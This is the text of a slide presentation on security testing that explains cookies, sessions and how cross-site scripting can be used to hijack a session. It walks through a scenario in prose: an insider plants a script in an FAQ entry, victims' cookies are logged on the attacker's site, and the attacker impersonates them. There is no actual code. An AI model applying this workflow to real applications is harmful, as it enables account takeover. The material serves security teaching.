Click here to load reader
Upload
tharinda-liyanage
View
370
Download
2
Embed Size (px)
DESCRIPTION
Security testing: Session hijacking using cross site scripting techniques. Basic introduction about cookies, sessions, need for cookies, how they are hijacked, purposes etc
Citation preview
SESSION HIJACKING WITH XSS
"I BECOME YOU"
SESSION IN COOKIE
• HTTP AND HTTPS ARE STATELESS PROTOCOLS
• TO COMBAT THIS, WHEN YOU FIRST VISIT A SITE YOU ARE ISSUED A UNIQUE SESSION ID
COOKIE…
• IS A SMALL PIECE OF TEXT STORED BY THE USER BROWSER.
• IS SENT AS AN HEADER BY THE WEB SERVER TO THE WEB BROWSER ON THE CLIENT SIDE.
• IS STATIC AND IS SENT BACK BY THE BROWSER UNCHANGED EVERY TIME IT ACCESSES THE SERVER.
• HAS A EXPIRATION TIME THAT IS SET BY THE SERVER AND ARE DELETED AUTOMATICALLY
AFTER THE EXPIRATION TIME.
• COOKIE IS USED TO MAINTAIN USERS AUTHENTICATION AND TO IMPLEMENT SHOPPING CART DURING HIS NAVIGATION, POSSIBLY ACROSS MULTIPLE VISITS.
HIJACKING : “ I BECOME YOU”
HIJACKER’S PERSONA
• Is a Customer Service user with limited access (level 5)
• Has knowledge in hacking• Has coding skills• With a wicked motive of gaining
full access to the application
HOW…
1. STEAL THE SESSION INFORMATION (USING XSS ATTACK)
2. REPLACE HIJACKER’S COOKIE WITH VICTIM’S
HOW HE PLANS THE ATTACK…
• LOOKS FOR VULNERABILITIES IN THE APPLICATION
• SEES AN OPPORTUNITY TO DO AN XSS EXPLOITATION IN
“KNOWLEDGEBASE” MODULE
• PLANT A MALICIOUS SCRIPT IN FAQ ENTRY.
• VICTIM VISIT THE FAQ ENTRY AND CLICK ON THE LINK TO “SEE MORE INFO”
• VICTIMS COOKIE INFORMATION IS SENT TO HIJACKER’S WEBSITE WHERE THE INFORMATION GETS LOGGED
• HACKER USES A COOKIE EDITOR TO CHANGE THE VALUES OF THE COOKIE AND LOGIN TO THE
APPLICATION AS THE VICTIM